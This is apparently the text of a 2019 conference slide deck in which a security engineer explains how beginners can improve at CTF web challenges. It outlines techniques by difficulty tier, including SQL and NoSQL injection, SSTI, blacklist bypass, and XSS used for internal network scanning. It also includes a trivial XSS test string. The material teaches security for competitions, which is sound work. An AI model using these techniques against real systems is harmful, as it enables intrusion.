How to strengthen the CTF Web field for beginners !!
Although you are studying the CTF web field, are you worried that you can't solve it in production?
For those who have such problems, I will explain how to strengthen the web field based on my experience.
(study group) https://yahoo-osaka.connpass.com/event/149524/
1. How to strengthen the CTF Web field
for beginners
2019/10/16
Panasonic Corporation
Product Security Center
Verification Measures Department
Tomohisa Maeda
『Mix Leap Study #52 - The forefront of cyber security 』
2. Self-introduction
■name Maeda Tomohisa
Twitter: @kazkiti_ctf
■Career
Graduated from Graduate School of Mechanical Engineering
Joined Panasonic Corporation
・ Design/manufacturing quality consultant 9 years
・ System Engineer(SIer) 2 years
・ Security engineer 5.5 years
(Incumbent)
Engaged in vulnerability diagnosis,
threat analysis, design support, etc.
3. Career and achievements such as CTF
■Career and achievements such as CTF
second place second place championship
2016 2017 2018 20192015
Entered SECCON
domestic finals
Medical security hacking contest in Japan
Started CTF in Japan
Started CTF around the world
Started
bug
bounty
Established our CTF team (Pwnasonic)
5. Why did I decide to do CTF?
Since becoming a security engineer
Year zero~ Actually, I was a beginner
who didn't even know Cookie …
↓
Acquisition of basic technical skills through
vulnerability diagnosis work
First year~ Promoting vulnerability diagnosis work by one person …
I was always worried “Isn't it leaking the vulnerability?”
I felt “Web application vulnerability diagnosis is deep”
↓
Further technical improvement is required!
Concentrate resources on web apps! (choice and focus)
↓
The CTF Web field was selected as a means of growth for
“enjoying technical improvements and utilizing them in business”
6. When I started the CTF Web field
■Features of the CTF Web field
・The range of questions is too wide!
・There are too many types of vulnerabilities!
↓
・ So I don't know where to start!
PHP Python
Node.js
MySQL
SQLite
postgresql
SSTI
XSS
Apache
nginx
LFI
RFI
SSRF
html css
javascript
XXE
LDAP
SQL
OAuth2.0
SAML
Ruby
java
CVE
OIDC
JSON
windows
Linux
IIS
Perl
serialization
XML
MSSQL
oracleSSO JWT
NoSQLXPATH
AWS S3
Cloudfront
Lambda
7. The study method I tried for the time being (failure story)
■My failure story
・ For the time being, the question frequency is high
“Let's be able to solve 100% of the SQL injection problem!”
I started studying.
↓
・ However, SQL injection is deep and falls into a quagmire ...
9. ■Purpose
Purpose/Means/Resource reservation
■Resource reservation
Prepare to dedicate every weekend to CTF
※CTF is mostly held on weekends
Do CTF around the world to do the numbers
Sites that summarize CTF schedules around the world
http://ctftime.org
■Means
Improve technical skills and utilize them in business
10. ■Goal setting ※How far do you want to be able to solve?
Goal setting / quantification
The difficulty level
(Accuracy rate[%])
Number of teams that solved the problem
Number of teams that solved one or more
questions in total
Technical ability to solve 0-1%
Technical ability to solve 1-5%
Technical ability to solve 5-10%
Technical ability to solve 10-20%
Technical ability to solve 20-40%
Technical ability to solve 40-100%
World TOP10
Japan top class
Senior
Intermediate
Beginner
Inexperienced CTF
■Grasping current ability ※ Measured and defined several times
My ability at that time was all solved at the difficulty level
(correct answer rate 30%) ⇒ Beginner level
■Approximate relationship between technical skills and difficulty
※ Measured and defined several times
=
11. Enter the correct answer rate in write-up (solution), and grasp your ability
In this way I wrote the correct
answer rate and was grasping my
ability every day.
【 advantage 】
・It became easier to take countermeasures because the
strengths and weaknesses of the field were identified with
objective indicators.
14. What should we do to be able to solve the accuracy rate of 40-100%?
■Inexperienced CTF
・ People who do not have enough security technology
・ People who have IT-related technology such as development technology
(Example of development technology)
・Understanding the basics of the website (html, css, javascript, etc.)
・Ability to read and understand programming languages
・How to use git
・Setting of HTTP server (Apache / nginx etc.)
15. Example problem:TokyoWesterns CTF 4th 2018 (1/2)
The following PHP source code can be obtained by
accessing the URL
[Goal] Flag is displayed
16. Example problem:TokyoWesterns CTF 4th 2018 (2/2)
【Breakthrough point】
Ability to read code
・ Set auth to action parameter
・ Set the hashed_password parameter to c019f6e5cd8aa0bbbcc6e994a54c757e
・ Set user or pass parameter to empty (do not overwrite hashed_password)
[Goal] Flag is displayed
(Detailed explanation)https://ctftime.org/writeup/10891
18. What should we do to be able to solve the accuracy rate of 20-40%?
■Issues that require knowledge/investigation of security
・CTF for beginners (picoCTF, etc.)
・Same problem as previous questions (check write-up)
※Once a question is asked, it becomes a known problem even if the difficulty level is high
・Books (Security Contest Challenge Book etc.)
・Known famous vulnerabilities
※Ability to investigate attack methods of vulnerabilities with CVE and solve them in time
※Persons in charge of incident response work are good at
19. Example problem:ENCRYPT CTF 2019 (1/2)
When accessing the URL, the following html response is obtained
【Breakthrough point】
Basic knowledge of security
・Since it is 32 hexadecimal digits, it is MD5 of the hash value
・Since MD5 cannot be calculated backwards, it must be searched lexicographically.
20. Example problem:ENCRYPT CTF 2019 (2/2)
Since the previous value was 100,
Let's calculate and send MD5 values ??from 0 to 101!
[Goal] Flag was obtained
(Detailed explanation)https://ctftime.org/writeup/14332
21. Have you stopped around here?
Let's aim for the next level soon!
23. What should we do to be able to solve the accuracy rate of 10-20%?
■Environmental construction ability
1.Problems that cannot be solved without an environment
(e.g.1)SSRF problem ⇒ DNSRebinding ※DNS server required
(e.g.2)XSS problem ※HTTP server required
2.The difficulty can be reduced if the environment is built and
trial and error
(e.g.1) Problems with source code ※Trial and error can be done in a server
⇒PHP,Python,Node.js etc.
(e.g.2)SQL Injection ※A trial and error is possible by setting up a SQL server
■Measures
・Set up an EC2 server with an AWS account ※1 year free
・Domain registration with DNS ※ About 100 yen per year
・Know how to set up servers in various languages
using container technology (Docker, etc.)
Try various servers and make trial and error!important
24. Example problem:angstromCTF 2019 (1/1)
【Breakthrough point】
・Once Node.js server was set up, it was trial and error
in the environment of NoSQL injection.
(Detailed explanation)https://ctftime.org/writeup/14922
26. What should we do to be able to solve the accuracy rate of 5-10%?
■Comprehensive power
1.BlackList-Bypass problems
・SQL injection
・OS command injection
・SSTI(Server Side Template Injection)
・Arbitrary code execution
■Measures
・Examine the functions in advance in a comprehensive manner
・Check specifications/RFC in advance
28. Example problem:TokyoWesterns CTF 4th 2018(2/2)
【Breakthrough point】
・ I was exhaustively examining functions that could
execute arbitrary code from SSTI
[Goal] Flag was obtained
Blacklist
(Detailed explanation)https://ctftime.org/writeup/10895
30. What should we do to be able to solve the accuracy rate of 1-5%?
■Ability to enumerate attack scenarios
・Rare vulnerabilities (difficult to find)
・XSS and CSS injection by relative path overwrite attack
・XSS by Cache-Poisoning
・LDAP injection
・Complex problems with other fields such as binary/crypto
■Measures
・Keep all vulnerabilities known and discoverable
・Collecting cutting-edge information on a daily basis
32. Example problem:Meepwn CTF Quals 2019 (2/2)
[Goal] Flag was obtained
Final attack URL
【Breakthrough point】
・ Understand XSS by relative path overwrite attack, which is a
rare vulnerability
※After that, create an attack URL according to the conditions.
(Detailed explanation)https://ctftime.org/writeup/10442
34. What should we do to be able to solve the accuracy rate of 0-1%?
Throw away something important in life!
Every day,
I’ll devote myself thoroughly
I'll try my best.
First break through
one point focusing
on some vulnerabilities
XSS Payload
<script>alert(1)</scrip>
What is XST ...
Danger
35. Example problem:Tokyo Westerns CTF 3rd 2017 (1/2)
Accessing the HTTP server via the proxy server,
The source code is given as follows
Also, the flag location is under the network of the
Web server Located on another local server
【Breakthrough point】
・2 years of study and information gathering every day focusing on XSS
・It took 14 hours to solve this question ...
・I feel like I lost something important in my life ...
36. Example problem:Tokyo Westerns CTF 3rd 2017 (2/2)
▼Flow to final attack code completion
Read because the Python code was given
↓
Found XSS vulnerability in Referer header
※Usually, the Referer header is URL encoded,
so XSS is not possible. However,
XSS was possible because of a special proxy.
↓
Since the location of Flag is a local IP address,
Brute force the local IP address using XSS
Network investigation and found that 192.169.0.4 exists
↓
Again with XSS, for obtaining the flag of 192.168.0.4
Complete the final attack code
(Detailed explanation)https://ctftime.org/writeup/7461
37. まとめ
Make good use of CTF
with pleasure
Let's improve our technical skills!